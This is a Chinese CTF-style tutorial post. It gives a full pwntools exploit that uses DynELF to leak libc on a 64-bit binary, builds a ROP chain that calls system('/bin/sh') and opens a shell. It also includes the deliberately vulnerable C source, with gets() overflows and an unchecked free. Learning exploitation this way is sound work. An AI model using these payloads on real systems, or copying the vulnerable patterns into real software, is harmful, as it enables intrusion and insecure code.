这几天有同学问我在64位下怎么用这个函数,于是针对同一道题写了个利用dynELF的方法

编译好的程序 http://pan.baidu.com/s/1jImF95O

源码在后面

from pwn import *

elf = ELF('./pwn_final')

got_write = elf.got['write']

print 'got_write= ' + hex(got_write)

call_get_name_func = 0x400966

print 'call_get_name_func= ' + hex(call_get_name_func)

got_read = elf.got['read']

print "got_read: " + hex(got_read)

bss_addr = 0x6020c0

pad = 'a'

p = process('./pwn_final')

gdb.attach(p)

#get system address

def leak(address):

    p.recvuntil('please enter your name:')

    payload1 = pad * 56

    payload1 += p64(0x400d9a)+ p64(0) + p64(1) + p64(got_write) + p64(128) + p64(address) + p64(1) + p64(0x400d80)

    payload1 += "\x00"*56

    payload1 += p64(call_get_name_func)

    p.sendline(payload1)

    data = p.recv(128)

    print "%#x => %s" % (address, (data or '').encode('hex'))

    return data

d = DynELF(leak, elf=ELF('./pwn_final'))

system_addr = d.lookup('system', 'libc')

print "system_addr=" + hex(system_addr)

#write system && /bin/sh

payload2 = "a"*56

payload2 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(got_read) + p64(16) + p64(bss_addr) + p64(0) + p64(0x400d80)

payload2 += "\x00"*56

payload2 += p64(call_get_name_func)

p.sendline(payload2)

p.send(p64(system_addr))

p.send("/bin/sh\0")

p.recvuntil('name:')

# call system

payload3 = "a"*56

payload3 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(0) + p64(0) + p64(bss_addr+8) + p64(0x400d80)

payload3 += "\x00"*56

payload3 += p64(call_get_name_func)

p.sendline(payload3)

p.interactive()

源码

#include <stdio.h>

#include <unistd.h>

#include <stdlib.h>

#include <string.h>

void print_menu();

void get_name();

void add_paper();

void delete_paper();

void show_paper();

int get_num();

void get_input(char *buffer, int size, int no_should_fill_full);

void gg();

char *link_list[10];

int main()

{

    setbuf(stdout, 0);

    setbuf(stdin, 0);

    setbuf(stderr, 0);

    int choice;

    get_name();

    while (1){

        print_menu();

        choice = get_num();

        switch (choice){

            case 1:

                add_paper();

                break;

            case 2:

                delete_paper();

                break;

            case 3:

                show_paper();

                break;

            default:

                return;

        }

    }

    printf("thank you!");

}

int get_num()

{

    int result;

    char input[48];

    char *end_ptr;

    get_input(input, 48, 1);

    result = strtol(input, &end_ptr, 0);

    if (input == end_ptr){

        printf("%s input is not start with number!\n", input);

        result = get_num();

    }

    return result;

}

void get_input(char *buffer, int size, int no_should_fill_full)

{

    int index = 0;

    char *current_location;

    int current_input_size;

    while (1){

        current_location = buffer+index;

        current_input_size = fread(buffer+index, 1, 1, stdin);

        if (current_input_size <= 0)

            break;

        if (*current_location == '\n' && no_should_fill_full){

            if (index){

                *current_location = 0;

                return;

            }

        }else{

            index++;

            if (index >= size)

                break;

        }

    }

}

void get_name()

{

    char name[40];

    printf("please enter your name:");

    gets(name);

}

void print_menu()

{

    puts("Welcome to use the improved paper management system!");

    puts("1 add paper");

    puts("2 delete paper");

    puts("3 show paper");

}

void show_paper()

{

    int index;

    int length;

    printf("Input the index of the paper you want to show(0-9):");

    scanf("%d", &index);

    if (index < 0 || index > 9)

        exit(1);

    printf("How long you will enter:");

    scanf("%d", &length);

    if (length < 0 || length > 2048)

        exit(1);

    write(stdout, link_list[index], length);

}

void add_paper()

{

    int index;

    int length;

    printf("Input the index you want to store(0-9):");

    scanf("%d", &index);

    if (index < 0 || index > 9)

        exit(1);

    printf("How long you will enter:");

    scanf("%d", &length);

    if (length < 0 || length > 2048)

        exit(1);

    link_list[index] = malloc(length);

    if (link_list[index] == NULL)

        exit(1);

    printf("please enter your content:");

    gets(link_list[index]);

    printf("add success!\n");

}

void delete_paper()

{

    int index;

    printf("which paper you want to delete,please enter it's index(0-9):");

    scanf("%d", &index);

    if (index < 0 || index > 9)

        exit(1);

    free(link_list[index]);

    puts("delete success !");

}

void gg()

{

    char name[40];

    read(stdin, name, 40);

}

64位下pwntools中dynELF函数的使用的更多相关文章

  1. 64位下Hook NtOpenProcess的实现进程保护 + 源码 (升级篇 )

    64位下Hook NtOpenProcess的实现进程保护 + 源码 (升级篇 ) [PS: 如果在64位系统下,出现调用测试demo,返回false的情况下,请修改Hook Dll的代码] glhH ...

  2. 2 pygraphviz在windows10 64位下的安装问题(反斜杠的血案)

    可以负责任的说,这篇文档是windows10安装pygraphviz中,在中文技术网站中最新的文档,没有之一.是自己完全结合各种问题,包括调试等,总结出来的. 问题来源:主要是可视化RvNN网络的树结 ...

  3. 在64位SQL Server中创建Oracle的链接服务器 Link Server

    有时候我们希望在一个sqlserver下访问另一个sqlserver数据库上的数据,或者访问其他oracle数据库上的数据,要想完成这些操作,我们首要的是创建数据库链接. 数据库链接能够让本地的一个s ...

  4. 64位下的InlineHook

    目录 x64下手工HOOK的方法 一丶HOOK的几种方法之远跳 1. 远跳 不影响寄存器 + 15字节方法 2.远跳 影响寄存器 + 12字节方法 3.影响寄存器,恢复寄存器 进行跳转. 4. 常用 ...

  5. win10 64位专业版系统中显示32位dcom组件配置的方法

    word.excel是32位的组件,当用户64位系统在运行窗口中输入dcomcnfg命令时,在打开的组件服务管理窗口,是找不到Microsoft Excel.word程序的.另外,Windows 环境 ...

  6. win7(64)位下WinDbg64调试VMware10下的win7(32位)

    win7(64)位下WinDbg64调试VMware10下的win7(32位) 一 Windbg32位还是64位的选择 参考文档<Windbg 32位版本和64位版本的选择> http:/ ...

  7. Ubuntu 14.04 AMD 64位 下 Android Studio 的安装

    Ubuntu 14.04 AMD 64位 下 Android Studio 的安装 作者:yoyoyosiyu 邮箱:yoyoyosiyu@163.com 时间:2015年8月25日 Android ...

  8. [转]在64位的环境中使用VS建立Web项目进行Oracle连接需要注意WebDev是32位的

    本文转自:http://www.cnblogs.com/studyzy/archive/2010/10/28/1863056.html 我们平时使用的都是32位的机器进行开发,装的都是32位的软件,但 ...

  9. 偶然碰到的Win7 64位下CHM 的问题解决

    最近下了几个沪江资料,都是chm格式的,但是在win7 64位下,都显示不了里面的音频和视频flash之类的控件,虽然可以通过源文件的方式打开视频文件,但是很麻烦.    网上似乎碰到的人也不是很多, ...

随机推荐

  1. Git技巧:右键菜单怎么去除?

    如果你是按照http://www.cnblogs.com/dunitian/p/5034624.html 那么你就没有这么多蛋疼的菜单了(反之:vs帮你安装的就蛋疼了) 说下解决方法: 1.Win+R ...

  2. 前端MVVM框架设计及实现

    最近抽出点时间想弄个dom模块化的模板引擎,不过现在这种都是MVVM自带的,索性就想自己造轮子写一个简单的MVVM框架了 借鉴的自然还是从正美的Avalon开始了,我2013年写过一个关于MVC MV ...

  3. MVC5 网站开发之四 业务逻辑层的架构和基本功能

    业务逻辑层在Ninesky.Core中实现,主要功能封装一些方法通过调用数据存储层,向界面层提供服务.   目录 奔跑吧,代码小哥! MVC5网站开发之一 总体概述 MVC5 网站开发之二 创建项目 ...

  4. 别语言之争了,最牛逼的语言不是.NET,也不是JAVA!

    谁都不用说,博客园明显的偏.NET,C#的讨论一出现,推荐讨论热火朝天,而发点JAVA的东西,应者寥寥.一旦有出现两大派系的竞争,那绝对是头条.每天都看,早就麻木了. 研二的我浸淫.NET已经三四年, ...

  5. JMS学习之路(一):整合activeMQ到SpringMVC

    JMS的全称是Java Message Service,即Java消息服务.它主要用于在生产者和消费者之间进行消息传递,生产者负责产生消息,而消费者负责接收消息.把它应用到实际的业务需求中的话我们可以 ...

  6. React.js实现原生js拖拽效果及思考

    一.起因&思路 不知不觉,已经好几天没写博客了...近来除了研究React,还做了公司官网... 一直想写一个原生js拖拽效果,又加上近来学react学得比较嗨.所以就用react来实现这个拖 ...

  7. 两种方式实现java生成Excel

    Web应用中难免会遇到需要将数据导出并生成excel文件的需求.同样,对于本博客中的总结,也是建立在为了完成这样的一个需求,才开始去了解其实现形式,并且顺利完成需求的开发,先将实现过程总结于此.本博文 ...

  8. 前端CSS部分知识整理

    1.如何清除图片下方出现几像素的空白间隙? /*方法1:*/ img{display:block;} 方法2: /*img{vertical-align:top;}*/ 2.如何让文本垂直对齐文本输入 ...

  9. ASP.NET Core 中文文档 第二章 指南(4.3)添加 View

    原文:Adding a view 作者:Rick Anderson 翻译:魏美娟(初见) 校对:赵亮(悲梦).高嵩(Jack).娄宇(Lyrics).许登洋(Seay).姚阿勇(Dr.Yao) 本节将 ...

  10. visual studio code更新

    早上起来正在看go语言,vsc提示有更新,之后安装,重启之后显示中文菜单,显然vsc支持本地化了. 查看发行说明:https://code.visualstudio.com/updates#vscod ...